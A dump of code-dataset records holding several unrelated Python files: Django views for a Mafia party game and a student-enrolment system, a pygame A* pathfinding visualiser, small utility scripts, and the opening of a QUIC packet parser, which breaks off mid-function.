tears,suspicious glances,abject despair,sandwiches,mixed feelings] \\\n are with [the family,the whole world,no one in particular,their grieving widow,the concept of peace,in usual parameters,no clear target] at this difficult time.\",\n\n \"The deceased leaves behind their pet [dog,iguana,zebra,chincilla,rattlesnake,panda,goldfish,Chubby,flamingo,colony of ants who are each named,rock,thermos flask of dna] {{name}} Jr. \\\n and an unmoved [spouse,set of triplets,mother-in-law,universe,autistic daughter,collection of vintage baseball cards,tree,conjoined twin,tape worm colony].\",\n\n \"\\\"They were always into [hang-gliding,pot-holing,archery,other people's business,self-improvement,meditation,achieving one-ness,more debt than could ever be paid off,morbid cosplay,self-asphyxiation,weird shit]\\\", \\\n [a close friend,a passing cyclist,a disembodied voice,a street drunk,everyone we spoke to,the voice of time,a generic pundit,the local minister,someone special,their accountant,their one remaining friend,someone who didn't know them that well] \\\n remarked \\\"so I guess it's what they would have wanted\\\"\",\n ],\n ]\n\n report_lines = (re.sub(r'\\[(.*?)\\]',\n lambda m: random.choice(m.group(1).split(',')),\n random.choice(x).replace('{{name}}', name)\n )\n for x in templates)\n return \"\\n\".join(report_lines)\n\n\ndef target(request):\n game = Game.objects.get(id=request.session['game_id'])\n player = Player.objects.get(id=request.session['player_id'])\n round = calculate_round(game)\n\n game_url = reverse('matthews:game')\n\n if int(request.POST['round']) != round:\n # don't save a vote from a round that's already finished (e.g. a late ghost vote)\n if player.died_in_round is None or player.died_in_round > round:\n # but only show a warning if we think they've tried to vote a second time\n msg = \"The voting for this round has closed - your last action was not counted.\"\n messages.add_message(request, messages.WARNING, msg)\n elif 'cancel' in request.POST:\n action = Action.objects.filter(done_by=player, round=round)\n action.delete()\n game_url += '?undone=1'\n else:\n target = Player.objects.filter(id=request.POST['target']).first()\n\n if target and target.game.id != game.id:\n raise Exception(\"That player's not in this game\")\n save_action(game, player, target)\n\n return HttpResponseRedirect(game_url)\n\n\ndef test404(request):\n raise Http404(\"Test: Not found\")\n\n\ndef test500(request):\n raise Exception(\"Test: An error occurred\")\n\n\ndef calculate_round(game):\n return floor(Action.objects.filter(done_by__game=game).count() / game.players.count())\n\n\ndef save_action(game, done_by, done_to):\n round = calculate_round(game)\n action = Action.objects.filter(round=round, done_by=done_by).first() \\\n or Action(round=round, done_by=done_by)\n action.done_to = done_to\n action.save()\n\n # Fill in blank actions for dead players who haven't acted so they don't hold up the game\n non_voters = yet_to_vote(game, round)\n if non_voters.count() == 0:\n for corpse in yet_to_vote(game, round, False):\n action = Action(round=round, done_by=corpse, done_to=None)\n action.save()\n\n if calculate_round(game) != round: # If this action completes a round of voting\n victims = who_died(game, round)\n for victim in victims:\n victim.died_in_round = round\n victim.save()\n\n\ndef yet_to_vote(game, round, is_alive=True):\n \"\"\" Return a query idenfying alive players who have not voted in this round\n \"\"\"\n return game.players.filter(died_in_round__isnull=is_alive) \\\n .exclude(actions_by__round=round)\n\n\ndef who_died(game, round):\n \"\"\" returns a list of players who were killed by the actions of this round\n \"\"\"\n\n if round % 2 == 0: # process day vote\n nominees = game.players.filter(actions_to__round=round,\n actions_to__done_by__died_in_round__isnull=True) \\\n .annotate(votes=Count('actions_to')) \\\n .annotate(good_votes=Count('actions_to', filter=~Q(actions_to__done_by__character_id=MAFIA_ID))) \\\n .order_by('-votes')\n nominee = nominees.first()\n num_alive_players = game.players.exclude(died_in_round__isnull=False).count()\n if nominee and ( nominee.votes > num_alive_players / 2 # Simple majority\n or nominee.good_votes == game.list_good_guys().count() # Good-guy consensus\n ):\n return [nominee]\n\n else: # process night actions\n targets = game.players.filter(actions_to__round=round,\n actions_to__done_by__died_in_round__isnull=True,\n actions_to__done_by__character_id=MAFIA_ID) \\\n .annotate(votes=Count('actions_to')) \\\n .order_by('-votes')\n\n if not targets.count():\n return[]\n target = random.Random().choice(list(targets))\n\n doctor_save_action = Action.objects.filter(done_by__game=game,\n round=round, done_to=target,\n done_by__character_id=DOCTOR_ID,\n done_by__died_in_round__isnull=True).first()\n\n num_bad_guys = game.list_bad_guys().count()\n num_good_guys = game.list_good_guys().count()\n if num_bad_guys == num_good_guys and target.votes < num_bad_guys:\n # reject a game-winning assassination if it's not done with consensus\n return []\n\n if target and not doctor_save_action:\n return [target]\n return []\n\n\ndef get_endgame_type(game):\n \"\"\" returns 'bad' if bad guys win, 'good' if good guys win else None \"\"\"\n if not game.date_started:\n return None\n\n players = game.players.filter(died_in_round__isnull=True)\n num_players = players.count()\n num_bad = game.list_bad_guys().count()\n num_good = game.list_good_guys().count()\n\n if num_bad == 0:\n return 'good'\n if num_bad > num_good:\n return 'bad'\n if num_bad == 1 and num_good == 1:\n return 'truce'\n return None\n\n\ndef cast_all(request):\n game = Game.objects.get(id=request.session['game_id'])\n round = calculate_round(game)\n non_voters = yet_to_vote(game, round)\n\n target = None #non_voters.first()\n for player in non_voters:\n save_action(game, player, target)\n\n return HttpResponseRedirect(reverse('matthews:game'))\n","repo_name":"jamespstrachan/matthews","sub_path":"src/matthews/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":29738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"70271864211","text":"import json\nfrom datetime import datetime\n\nfrom django.db.models import Q\nfrom django.http import HttpResponse\nfrom django.shortcuts import redirect\nfrom django.shortcuts import render\n\nfrom app.models import BasicInfo\nfrom app.models import ExamArea\nfrom app.models import Faculty\nfrom app.models import Language\nfrom app.models import Nationality\nfrom app.models import Sex\n\n\ndef select_html(request):\n data = dict()\n\n # 前端数据\n select_number = request.GET.get('number', '')\n select_name = request.GET.get('name', '')\n select_sex = request.GET.get('sex', '')\n select_faculty = request.GET.get('faculty', '')\n select_class_name = request.GET.get('class_name', '')\n select_exam_area = request.GET.get('exam_area', '')\n select_into_date = request.GET.get('into_date', '')\n select_language = request.GET.get('language', '')\n select_nationality = request.GET.get('nationality', '')\n\n # 当前查询条件\n data['select_number'] = select_number\n data['select_name'] = select_name\n data['select_sex'] = select_sex\n data['select_faculty'] = select_faculty\n data['select_class_name'] = select_class_name\n data['select_exam_area'] = select_exam_area\n data['select_into_date'] = select_into_date\n data['select_language'] = select_language\n data['select_nationality'] = select_nationality\n\n # 下拉框\n data['faculty'] = Faculty.objects.values_list('name', flat=True)\n data['exam_area'] = ExamArea.objects.values_list('name', flat=True)\n data['language'] = Language.objects.values_list('name', flat=True)\n data['nationality'] = Nationality.objects.values_list('name', flat=True)\n data['sex'] = Sex.objects.values_list('name', flat=True)\n\n # 拼接查询条件\n q = Q()\n q.connector = 'AND'\n if select_number != '':\n q.children.append(('number', select_number))\n if select_name != '':\n q.children.append(('name', select_name))\n if select_sex != '':\n select_sex_obj = Sex.objects.filter(name=select_sex).first()\n q.children.append(('sex', select_sex_obj))\n if select_faculty != '':\n select_faculty_obj = Faculty.objects.filter(name=select_faculty).first()\n q.children.append(('faculty', select_faculty_obj))\n if select_class_name != '':\n q.children.append(('class_name', select_class_name))\n if select_exam_area != '':\n select_exam_area_obj = ExamArea.objects.filter(name=select_exam_area).first()\n q.children.append(('exam_area', select_exam_area_obj))\n if select_into_date != '':\n select_into_date_obj = datetime.strptime(select_into_date, '%Y-%m-%d')\n q.children.append(('into_date', select_into_date_obj))\n if select_language != '':\n select_language_obj = Language.objects.filter(name=select_language).first()\n q.children.append(('language', select_language_obj))\n if select_nationality != '':\n select_nationality_obj = Nationality.objects.filter(name=select_nationality).first()\n q.children.append(('nationality', select_nationality_obj))\n\n # 查询数据\n objects = BasicInfo.objects.filter(q)\n all_data = list()\n for one_object in objects:\n one_data = dict()\n one_data['number'] = one_object.number\n one_data['name'] = one_object.name\n one_data['sex'] = one_object.sex\n one_data['faculty'] = one_object.faculty\n one_data['class_name'] = one_object.class_name\n one_data['exam_area'] = one_object.exam_area\n one_data['into_date'] = one_object.into_date\n one_data['language'] = one_object.language\n one_data['birthday'] = one_object.birthday\n one_data['nationality'] = one_object.nationality\n one_data['grade'] = one_object.grade\n one_data['email'] = one_object.email\n all_data.append(one_data)\n data['objects'] = all_data\n\n return render(request, 'select.html', data)\n\n\ndef add_html(request):\n data = dict()\n data['faculty'] = Faculty.objects.values_list('name', flat=True)\n data['exam_area'] = ExamArea.objects.values_list('name', flat=True)\n data['language'] = Language.objects.values_list('name', flat=True)\n data['nationality'] = Nationality.objects.values_list('name', flat=True)\n data['sex'] = Sex.objects.values_list('name', flat=True)\n return render(request, 'add.html', data)\n\n\n# 是否存在学号\ndef exist_number(request):\n ret = dict()\n exist = 'exist'\n number = request.GET['number']\n try:\n BasicInfo.objects.get(number=number)\n ret[exist] = True\n except Exception as e:\n ret[exist] = False\n return HttpResponse(json.dumps(ret), content_type=\"application/json\")\n\n\ndef add(request):\n # 前端数据\n number = request.POST['number']\n name = request.POST['name']\n sex = request.POST['sex']\n faculty = request.POST['faculty']\n class_name = request.POST['class_name']\n exam_area = request.POST['exam_area']\n into_date = request.POST['into_date']\n language = request.POST['language']\n birthday = request.POST['birthday']\n nationality = request.POST['nationality']\n grade = request.POST['grade']\n email = request.POST['email']\n\n # 新增对象\n add_obj = BasicInfo()\n add_obj.number = number\n add_obj.name = name\n add_obj.sex = Sex.objects.filter(name=sex).first()\n add_obj.faculty = Faculty.objects.filter(name=faculty).first()\n add_obj.class_name = class_name\n add_obj.exam_area = ExamArea.objects.filter(name=exam_area).first()\n try:\n into_date = datetime.strptime(into_date, '%Y-%m-%d')\n add_obj.into_date = into_date\n except Exception as e:\n print('格式化入学时间失败:{}'.format(e))\n add_obj.language = Language.objects.filter(name=language).first()\n try:\n print('birthday:{}'.format(birthday))\n birthday = datetime.strptime(birthday, '%Y-%m-%d')\n add_obj.birthday = birthday\n except Exception as e:\n print('格式化出生年月失败:{}'.format(e))\n add_obj.nationality = Nationality.objects.filter(name=nationality).first()\n add_obj.grade = grade\n add_obj.email = email\n add_obj.save()\n\n return redirect('/select.html')\n\n\ndef update_html(request):\n data = dict()\n number = request.GET['number']\n obj = BasicInfo.objects.get(number=number)\n\n # 通过id查询数据\n data['current_number'] = obj.number\n data['current_name'] = obj.name\n data['current_sex'] = obj.sex\n data['current_faculty'] = obj.faculty\n data['current_class_name'] = obj.class_name\n data['current_exam_area'] = obj.exam_area\n data['current_into_date'] = str(obj.into_date)\n data['current_language'] = obj.language\n data['current_birthday'] = str(obj.birthday)\n data['current_nationality'] = obj.nationality\n data['current_grade'] = obj.grade\n data['current_email'] = obj.email\n\n # 下拉框\n data['faculty'] = Faculty.objects.values_list('name', flat=True)\n data['exam_area'] = ExamArea.objects.values_list('name', flat=True)\n data['language'] = Language.objects.values_list('name', flat=True)\n data['nationality'] = Nationality.objects.values_list('name', flat=True)\n data['sex'] = Sex.objects.values_list('name', flat=True)\n return render(request, 'update.html', data)\n\n\ndef update(request):\n # 前端数据\n number = request.POST['number']\n name = request.POST['name']\n sex = request.POST['sex']\n faculty = request.POST['faculty']\n class_name = request.POST['class_name']\n exam_area = request.POST['exam_area']\n into_date = request.POST['into_date']\n language = request.POST['language']\n birthday = request.POST['birthday']\n nationality = request.POST['nationality']\n grade = request.POST['grade']\n email = request.POST['email']\n\n update_obj = BasicInfo.objects.get(number=number)\n update_obj.name = name\n update_obj.sex = Sex.objects.filter(name=sex).first()\n update_obj.faculty = Faculty.objects.filter(name=faculty).first()\n update_obj.class_name = class_name\n update_obj.exam_area = ExamArea.objects.filter(name=exam_area).first()\n try:\n into_date = datetime.strptime(into_date, '%Y-%m-%d')\n update_obj.into_date = into_date\n except Exception as e:\n print('格式化入学时间失败:{}'.format(e))\n update_obj.language = Language.objects.filter(name=language).first()\n try:\n print('birthday:{}'.format(birthday))\n birthday = datetime.strptime(birthday, '%Y-%m-%d')\n update_obj.birthday = birthday\n except Exception as e:\n print('格式化出生年月失败:{}'.format(e))\n update_obj.nationality = Nationality.objects.filter(name=nationality).first()\n update_obj.grade = grade\n update_obj.email = email\n update_obj.save()\n\n return redirect('/select.html')\n\n\ndef delete(request):\n ids = request.GET['ids']\n ids = ids.split(',')\n ids.pop(len(ids) - 1)\n for remove_id in ids:\n BasicInfo.objects.get(number=remove_id).delete()\n return redirect('/select.html')\n","repo_name":"rainbow-tan/rainbow","sub_path":"新生入学信息管理系统(django+sqllite或mysql)/app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9023,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"23979301905","text":"import pygame\nimport math\nfrom queue import PriorityQueue\npygame.init()\n\nGRID_WIDTH = 800\nWIN_WIDTH = 1200\nROWS = 50 # should divide GRID_WIDTH without reminder\n\nWIN = pygame.display.set_mode((WIN_WIDTH, GRID_WIDTH))\npygame.display.set_caption(\"A* Path Finding Algorithm\")\n\nRED = (255, 0, 0)\nGREEN = (0, 255, 0)\nBLUE = (0, 255, 0)\nYELLOW = (255, 255, 0)\nWHITE = (255, 255, 255)\nBLACK = (0, 0, 0)\nPURPLE = (128, 0, 128)\nORANGE = (255, 165 ,0)\nGREY = (128, 128, 128)\nTURQUOISE = (64, 224, 208)\nBAR = (250, 240, 230)\nCAPTION = (255, 127, 80)\nBARRIER = (139, 69, 19)\n\nclock = pygame.time.Clock()\n\nfont26 = pygame.font.SysFont(\"gillsans\", 26)\nfont18 = pygame.font.SysFont(\"arial.ttf\", 18)\nfont42 = pygame.font.SysFont(\"arial.ttf\", 42)\n\nclass Spot:\n\tdef __init__(self, row, col, width, total_rows):\n\t\tself.row = row\n\t\tself.col = col\n\t\tself.x = row * width\n\t\tself.y = col * width\n\t\tself.color = WHITE\n\t\tself.neighbors = []\n\t\tself.width = width\n\t\tself.total_rows = total_rows\n\t\tself.be_updated = True\n\n\tdef get_pos(self):\n\t\treturn self.row, self.col\n\n\tdef is_closed(self):\n\t\treturn self.color == RED\n\n\tdef is_open(self):\n\t\treturn self.color == GREEN\n\n\tdef is_barrier(self):\n\t\treturn self.color == BARRIER\n\n\tdef is_start(self):\n\t\treturn self.color == ORANGE\n\n\tdef is_end(self):\n\t\treturn self.color == TURQUOISE\n\n\tdef reset(self):\n\t\tif self.be_updated:\n\t\t\tself.color = WHITE\n\t\t\treturn True\n\t\treturn False\n\n\tdef make_start(self):\n\t\tif self.be_updated:\n\t\t\tself.color = ORANGE\n\t\t\treturn True\n\t\treturn False\n\n\tdef make_closed(self):\n\t\tif self.be_updated:\n\t\t\tself.color = RED\n\t\t\treturn True\n\t\treturn False\n\n\tdef make_open(self):\n\t\tif self.be_updated:\n\t\t\tself.color = GREEN\n\t\t\treturn True\n\t\treturn False\n\n\tdef make_border(self):\n\t\tself.color = BLACK\n\n\tdef make_barrier(self):\n\t\tif self.be_updated:\n\t\t\tself.color = BARRIER\n\t\t\treturn True\n\t\treturn False\n\n\tdef make_end(self):\n\t\tif self.be_updated:\n\t\t\tself.color = TURQUOISE\n\t\t\treturn True\n\t\treturn False\n\n\tdef make_path(self):\n\t\tif self.be_updated:\n\t\t\tself.color = PURPLE\n\t\t\treturn True\n\t\treturn False\n\n\tdef draw(self, win):\n\t\tpygame.draw.rect(win, self.color, (self.x, self.y, self.width, self.width))\n\n\tdef update_neighbors(self, grid):\n\t\tself.neighbors = []\n\t\tif self.row < self.total_rows - 1 and not grid[self.row + 1][self.col].is_barrier(): # DOWN\n\t\t\tself.neighbors.append(grid[self.row + 1][self.col])\n\n\t\tif self.row > 0 and not grid[self.row - 1][self.col].is_barrier(): # UP\n\t\t\tself.neighbors.append(grid[self.row - 1][self.col])\n\n\t\tif self.col < self.total_rows - 1 and not grid[self.row][self.col + 1].is_barrier(): # RIGHT\n\t\t\tself.neighbors.append(grid[self.row][self.col + 1])\n\n\t\tif self.col > 0 and not grid[self.row][self.col - 1].is_barrier(): # LEFT\n\t\t\tself.neighbors.append(grid[self.row][self.col - 1])\n\n\tdef __lt__(self, other):\n\t\treturn False\n\n\ndef h(p1, p2):\n\tx1, y1 = p1\n\tx2, y2 = p2\n\treturn abs(x1 - x2) + abs(y1 - y2)\n\n\ndef reconstruct_path(came_from, current, draw):\n\twhile current in came_from:\n\t\tcurrent = came_from[current]\n\t\tcurrent.make_path()\n\t\tdraw()\n\n\ndef algorithm(draw, grid, start, end, start_time):\n\tcount = 0\n\topen_set = PriorityQueue()\n\topen_set.put((0, count, start))\n\tcame_from = {}\n\tg_score = {spot: float(\"inf\") for row in grid for spot in row}\n\tg_score[start] = 0\n\tf_score = {spot: float(\"inf\") for row in grid for spot in row}\n\tf_score[start] = h(start.get_pos(), end.get_pos())\n\n\topen_set_hash = {start}\n\n\twhile not open_set.empty():\n\t\tfor event in pygame.event.get():\n\t\t\tif event.type == pygame.QUIT:\n\t\t\t\tpygame.quit()\n\n\t\tcurrent = open_set.get()[2]\n\t\topen_set_hash.remove(current)\n\n\t\tif current == end:\n\t\t\treconstruct_path(came_from, end, draw)\n\t\t\tend.make_end()\n\t\t\treturn True\n\n\t\tfor neighbor in current.neighbors:\n\t\t\tupdate_timer(start_time)\n\t\t\ttemp_g_score = g_score[current] + 1\n\n\t\t\tif temp_g_score < g_score[neighbor]:\n\t\t\t\tcame_from[neighbor] = current\n\t\t\t\tg_score[neighbor] = temp_g_score\n\t\t\t\tf_score[neighbor] = temp_g_score + h(neighbor.get_pos(), end.get_pos())\n\t\t\t\tif neighbor not in open_set_hash:\n\t\t\t\t\tcount += 1\n\t\t\t\t\topen_set.put((f_score[neighbor], count, neighbor))\n\t\t\t\t\topen_set_hash.add(neighbor)\n\t\t\t\t\tneighbor.make_open()\n\n\t\tdraw()\n\n\t\tif current != start:\n\t\t\tcurrent.make_closed()\n\n\treturn False\n\ndef update_timer(start_time):\n\tWIN.fill(BAR, (810, 280, 900, 320))\n\tpassed_time = pygame.time.get_ticks() - start_time\n\tsec = str(passed_time // 1000)\n\tmilisec = str(passed_time / 1000 - passed_time // 1000)\n\tmilisec = milisec[2:4]\n\ttime = sec + \".\" + milisec + \" sec\"\n\tt = font42.render(time, False, CAPTION)\n\tt_rect = t.get_rect()\n\tt_rect.centerx, t_rect.centery = 900, 300\n\tWIN.blit(t, t_rect)\n\ndef reset_timer():\n\tWIN.fill(BAR, (810, 280, 900, 320))\n\n\ttime = \"0.0sec\"\n\tt = font42.render(time, False, CAPTION)\n\tt_rect = t.get_rect()\n\tt_rect.centerx, t_rect.centery = 900, 300\n\tWIN.blit(t, t_rect)\n\ndef make_grid(rows, width):\n\tgrid = []\n\tgap = width // rows\n\tfor i in range(rows):\n\t\tgrid.append([])\n\t\tfor j in range(rows):\n\t\t\tspot = Spot(i, j, gap, rows)\n\t\t\tif i == 0:\n\t\t\t\tspot.make_border()\n\t\t\t\tspot.be_updated = False\n\t\t\telif i == rows - 1:\n\t\t\t\tspot.make_border()\n\t\t\t\tspot.be_updated = False\n\n\t\t\telif j == 0 or j == rows - 1:\n\t\t\t\tspot.make_border()\n\t\t\t\tspot.be_updated = False\n\t\t\tgrid[i].append(spot)\n\n\n\treturn grid\n\n\ndef draw_grid(win, rows, width):\n\tgap = width // rows\n\tfor i in range(rows):\n\t\tpygame.draw.line(win, GREY, (0, i * gap), (width, i * gap))\n\t\tfor j in range(rows):\n\t\t\tpygame.draw.line(win, GREY, (j * gap, 0), (j * gap, width))\n\n\ndef draw(win, grid, rows, width):\n\twin.fill(WHITE, (0, 0, GRID_WIDTH, GRID_WIDTH))\n\n\tfor row in grid:\n\t\tfor node in row:\n\t\t\tnode.draw(win)\n\n\tdraw_grid(win, rows, width)\n\tpygame.display.update()\n\n\ndef get_clicked_pos(pos, rows, width):\n\tgap = width // rows\n\ty, x = pos\n\n\trow = y // gap\n\tcol = x // gap\n\n\treturn row, col\n\n\ndef main(win, width):\n\twin.fill(BAR)\n\tgrid = make_grid(ROWS, width)\n\n\tstart = None\n\tend = None\n\trun = True\n\n\tt = font26.render(\"Python visualization of A* algorithm\", False, CAPTION)\n\tt_rect = t.get_rect()\n\tt_rect.centerx, t_rect.centery = WIN_WIDTH - 200, 50\n\n\tWIN.blit(t, t_rect)\n\n\tt = font18.render(\"Finding the shortest path from one point to another\", False, CAPTION)\n\tt_rect = t.get_rect()\n\tt_rect.centerx, t_rect.centery = WIN_WIDTH - 200, 80\n\tWIN.blit(t, t_rect)\n\n\tspot = Spot(0, 0, GRID_WIDTH // ROWS, 0)\n\tspot.x = GRID_WIDTH + 30\n\tspot.y = 120\n\tspot.make_start()\n\tspot.draw(win)\n\n\tt = font18.render(\"- starting point\", False, CAPTION)\n\tt_rect = t.get_rect()\n\tt_rect.centerx, t_rect.centery = GRID_WIDTH + 110, 125\n\tWIN.blit(t, t_rect)\n\n\tspot.draw(win)\n\tspot.x = GRID_WIDTH + 30\n\tspot.y = 150\n\tspot.make_end()\n\tspot.draw(win)\n\n\tt = font18.render(\"- ending point\", False, CAPTION)\n\tt_rect = t.get_rect()\n\tt_rect.centerx, t_rect.centery = GRID_WIDTH + 110, 155\n\tWIN.blit(t, t_rect)\n\n\tspot.draw(win)\n\tspot.x = GRID_WIDTH + 30\n\tspot.y = 180\n\tspot.make_barrier()\n\tspot.draw(win)\n\n\tt = font18.render(\"- barrier\", False, CAPTION)\n\tt_rect = t.get_rect()\n\tt_rect.centerx, t_rect.centery = GRID_WIDTH + 90, 185\n\tWIN.blit(t, t_rect)\n\n\tt = font18.render(\"Press Space to start after putting start,\", False, CAPTION)\n\tt_rect = t.get_rect()\n\tt_rect.centerx, t_rect.centery = GRID_WIDTH + 145, 220\n\tWIN.blit(t, t_rect)\n\n\tt = font18.render(\"end and barriers\", False, CAPTION)\n\tt_rect = t.get_rect()\n\tt_rect.centerx, t_rect.centery = GRID_WIDTH + 80, 250\n\tWIN.blit(t, t_rect)\n\n\tt = font42.render(\"0.00 sec\", False, CAPTION)\n\tt_rect = t.get_rect()\n\tt_rect.centerx, t_rect.centery = GRID_WIDTH + 100, 300\n\tWIN.blit(t, t_rect)\n\n\n\n\twhile run:\n\t\tdraw(win, grid, ROWS, width)\n\t\tfor event in pygame.event.get():\n\t\t\tif event.type == pygame.QUIT:\n\t\t\t\trun = False\n\n\t\t\tif pygame.mouse.get_pressed()[0] and pygame.mouse.get_pos()[0] < GRID_WIDTH and pygame.mouse.get_pos()[1] < GRID_WIDTH: # LEFT\n\t\t\t\tpos = pygame.mouse.get_pos()\n\t\t\t\trow, col = get_clicked_pos(pos, ROWS, width)\n\t\t\t\tspot = grid[row][col]\n\t\t\t\tif start is None and spot != end:\n\t\t\t\t\tif spot.make_start():\n\t\t\t\t\t\tstart = spot\n\n\t\t\t\telif end is None and spot != start:\n\t\t\t\t\tif spot.make_end():\n\t\t\t\t\t\tend = spot\n\n\t\t\t\telif spot != end and spot != start:\n\t\t\t\t\tspot.make_barrier()\n\n\t\t\telif pygame.mouse.get_pressed()[2]: # RIGHT\n\t\t\t\tpos = pygame.mouse.get_pos()\n\t\t\t\trow, col = get_clicked_pos(pos, ROWS, width)\n\t\t\t\tspot = grid[row][col]\n\t\t\t\tif spot.reset():\n\t\t\t\t\tif spot == start:\n\t\t\t\t\t\tstart = None\n\t\t\t\t\telif spot == end:\n\t\t\t\t\t\tend = None\n\n\t\t\tif event.type == pygame.KEYDOWN:\n\t\t\t\tif event.key == pygame.K_SPACE and start and end:\n\t\t\t\t\tstart_time = pygame.time.get_ticks()\n\t\t\t\t\tfor row in grid:\n\t\t\t\t\t\tfor spot in row:\n\t\t\t\t\t\t\tspot.update_neighbors(grid)\n\n\t\t\t\t\talgorithm(lambda: draw(win, grid, ROWS, width), grid, start, end, start_time)\n\n\n\t\t\t\tif event.key == pygame.K_c:\n\t\t\t\t\tstart = None\n\t\t\t\t\tend = None\n\t\t\t\t\tgrid = make_grid(ROWS, width)\n\t\t\t\t\treset_timer()\n\n\tpygame.quit()\n\nmain(WIN, GRID_WIDTH)","repo_name":"NikitaPW/Python-A-star-PyGame","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8803,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"4221566558","text":"i=1\nx = int(input())\np=[]\np1=[]\ncounter = 0\nwhile True:\n c=0;\n for j in range (1, (i+1), 1):\n a = i%j\n if (a==0):\n c = c+1\n if (c==2):\n p.append(i)\n counter = counter + 1\n if counter >= x:\n break\n i=i+1\nsum=0\nfor i in range(x):\n sum+=p[i]\n p1.append(sum)\nprint(*p1)\n","repo_name":"GuhanSGCIT/SGCIT","sub_path":"prime adder.py","file_name":"prime adder.py","file_ext":"py","file_size_in_byte":341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"4115357432","text":"from lib import *\n\nclass Func:\n def __init__(self, func: str) -> None:\n self.func = func\n self.args = get_args(func)\n self.args_num = len(self.args)\n\n def func_to_python(self) -> None:\n self.lambda_str = fun_to_py(self.func)\n \n def exec_func(self, values: list) -> None:\n if self.lambda_str == None: raise Exception('No lambda string. Call func_to_python before this.')\n values_tuple_str = '('\n for value in values:\n values_tuple_str = values_tuple_str + str(value) + ', '\n values_tuple_str = values_tuple_str + ')'\n self.executable_func = self.lambda_str + values_tuple_str\n self.executable_func = (lambda x: eval_clojure(x))(self.executable_func)\n def get_func_exec(self):\n if self.lambda_str == None: raise Exception('No lambda string. Call func_to_python before this.')\n return eval_clojure(self.lambda_str)\n\n\nif __name__ == '__main__':\n f: Func = Func('3*x**2 + 5*x - 7')\n f.func_to_python()\n fu = f.get_func_exec()\n print(fu(2))\n","repo_name":"dmitryVonDrake/fun_graph_bot","sub_path":"func.py","file_name":"func.py","file_ext":"py","file_size_in_byte":1057,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"32213701253","text":"import os\nimport time\n\nresults = open(time.strftime('./Results/' + \"%Y-%m-%d-%H_%M_%S-result.txt\", time.localtime()), 'w')\n\ntemples = ''\nmirror_list = []\n\n# 1. read temple\nwith open('temple.txt', 'r', encoding='UTF-8') as file:\n for i in file.readlines():\n temples += i\n\n# 1. read mirror\nwith open('mirror.txt', 'r', encoding='UTF-8') as file:\n for i in file.readlines():\n item = i.strip('\\n')\n mirror_list.append(item)\n\nwith open('domains.txt', 'r', encoding='UTF-8') as file:\n index = 0;\n for i in file.readlines():\n name = i.strip('\\n')\n results.writelines('============ config for ' + name + ' start ============')\n results.writelines('\\n')\n mirror_config = mirror_list[index].split(':')\n str = temples.replace('AAA', name)\\\n .replace('BBB', mirror_config[0])\\\n .replace('CCC', mirror_config[1])\\\n .replace('DDD', mirror_config[0])\\\n + '\\n'\n results.writelines(str)\n results.writelines('============ config for ' + name + ' end ============')\n results.writelines('\\n')\n results.writelines('\\n')\n results.writelines('\\n')\n index = index + 1\n results.close()\n","repo_name":"Lucifer-23/Spider","sub_path":"Configs/BaoTa/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1228,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"41476624718","text":"# built-in modules\nfrom dataclasses import dataclass\nfrom enum import IntEnum\nfrom typing import List, Optional\n\n# implemented modules\nfrom .buffer import (\n Buffer,\n int_to_bytes,\n)\nfrom .crypto import (\n SymmetricContext,\n)\nfrom .frame_parser import (\n QuicFrameParser,\n QuicParsedFrame,\n)\nfrom .packet_builder import (\n PACKET_TYPE_INITIAL,\n PACKET_TYPE_ZERO_RTT,\n PACKET_TYPE_HANDSHAKE,\n PACKET_TYPE_RETRY,\n PACKET_TYPE_ONE_RTT,\n PACKET_TYPE_MASK,\n is_long_header\n)\nfrom .quic_types import (\n QuicProtocolVersion,\n)\n\n# logging module\nfrom logging import getLogger\nlogger = getLogger(__name__)\n\n\nclass QuicPacketParserState(IntEnum):\n PARSING_PACKET = 0x01\n PARSING_PAYLOAD = 0x02\n\n\n@dataclass\nclass QuicParsedPacket:\n is_long_header: bool\n packet_type: int\n dest_cid: bytes\n payload: bytes\n frames: List[QuicParsedFrame]\n src_cid: Optional[bytes] = b\"\"\n version: Optional[int] = 0\n\n\nclass QuicPacketParser:\n def __init__(\n self,\n symm_context: SymmetricContext\n ) -> None:\n\n # todo: add packets parsed with frames\n self._parsing_state: QuicPacketParserState = QuicPacketParserState.PARSING_PACKET\n\n # frame parser\n self._frame_parser = QuicFrameParser()\n\n # parsed data\n self._parsed_packets: List[QuicParsedPacket] = []\n\n # retry\n self._retry: bool = False\n\n # symmetric context\n self._symmetric_context = symm_context\n\n @property\n def parsed_packets(self) -> List[QuicParsedPacket]:\n return self._parsed_packets\n\n def set_retry(self, value: bool) -> None:\n self._retry = value\n\n def reset(self) -> None:\n # clear parsed packets in list\n self._parsed_packets = []\n\n def parse(self, packet: Buffer) -> None:\n\n # datagram parse pseudo\n\n # read first byte\n first_byte: bytes = packet.pull_uint8()\n\n packet_type: int = first_byte & PACKET_TYPE_MASK\n long_header: bool = is_long_header(packet_type)\n logger.debug(\n f\"packet type of {packet_type} is {('short header', 'long header')[long_header]}\")\n\n if packet_type == PACKET_TYPE_INITIAL:\n logger.debug(f\"packet type: INITIAL\")\n elif packet_type == PACKET_TYPE_ZERO_RTT:\n logger.debug(f\"packet type: ZERO RTT\")\n elif packet_type == PACKET_TYPE_HANDSHAKE:\n logger.debug(f\"packet type: HANDSHAKE\")\n elif packet_type == PACKET_TYPE_RETRY:\n logger.debug(f\"packet type: RETRY\")\n elif packet_type == PACKET_TYPE_ONE_RTT:\n logger.debug(f\"packet type: ONE RTT\")\n\n # parse packet number length\n packet_num_length = (packet_type & 0x03) + 1\n logger.debug(f\"packet number length: {packet_num_length}\")\n\n if long_header:\n # parse long header packet\n logger.debug(f\"parsing long header\")\n\n # parse version\n version = packet.pull_uint32()\n logger.debug(f\"version: {int_to_bytes(version).hex(' ', 2)}\")\n 